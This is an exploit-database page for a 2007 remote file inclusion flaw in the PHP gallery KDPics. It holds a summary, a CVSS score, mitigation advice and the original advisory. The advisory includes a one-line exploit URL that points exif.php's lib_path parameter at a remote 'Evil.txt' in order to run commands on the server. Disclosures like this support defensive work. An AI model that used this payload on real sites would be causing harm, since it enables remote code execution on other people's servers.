KDPics - exploit.company

vendor:

KDPics

by:

AsTrex

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: KDPics

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

KDPics <= Remote File Include Vulnerability

The vulnerability allows an attacker to include a remote file in the vulnerable PHP script. In this case, the vulnerable file is exif.php in the KDPics/lib/exifer/ directory. By manipulating the 'lib_path' parameter in the URL, an attacker can include a malicious file (Evil.txt) and execute arbitrary commands on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before including any files in the PHP script. Additionally, keeping the software up to date with the latest patches and security fixes is crucial.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
KDPics <=  Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by AsTrex    "Rif Hackers  Team"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL:
http://www.phpscripts-fr.net/scripts/download.php?id=2212
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
V.CODE: In :KDPics/lib/exifer/exif.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.victime.com/[KDPics_path]/lib/exifer/exif.php?lib_path?=Evil.txt?cmd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greeetz to : moroccan islam defenders ,ba azdin , xskull , savi7

# milw0rm.com [2007-02-03]